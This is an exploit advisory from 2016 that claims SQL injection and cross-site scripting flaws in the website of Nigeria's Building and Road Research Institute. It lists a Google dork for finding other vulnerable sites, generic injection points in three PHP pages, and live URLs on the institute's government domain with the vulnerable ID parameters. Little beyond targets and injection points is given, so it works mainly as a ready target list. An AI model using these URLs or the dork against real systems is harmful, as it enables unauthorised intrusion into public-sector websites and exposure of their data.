###########################################################################
# Exploit Title: NBRRI Sql Injection/Cross Site Scripting Vulnerability
# Google Dork: intext:Nigerian Building and Road Research Institute (NBRRI)
# Date: 29-06-2016
# Exploit Author: Amir Gates
# Vendor Homepage: www.nbrri.gov.ng
# Version: All version
# Tested on: kali
# CVE : None
###########################################################################
[-][-][-][-][-][-][-][-][-] Sql Injection Vulnerability [-][-][-][-][-][-][-][-]
http://www.localhost/[path]/news.php?id=[sql]
http://www.localhost/[path]/eventsdisplay.php?id=[sql]
http://www.localhost/[path]/pagetech.php?id=[sql]
*->Vulnerability in Nigeria Governmental website
http://www.nbrri.gov.ng/sites/news.php?ID=2
http://nbrri.gov.ng/eventsdisplay.php?ID=1
http://www.nbrri.gov.ng/sites/pagetech.php?id=14
[-][-][-][-][-][-][-][-] Cross Site Scripting [-][-][-][-][-][-][-][-][-]
http://www.localhost/[path]/news.php?id=[xss]
http://www.nbrri.gov.ng/sites/news.php?ID=
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Discover by: Amir Gates
we are: AmirGates - Ali Locker - Amir Unhex - Behzad
contact: amirgates76@gmail.com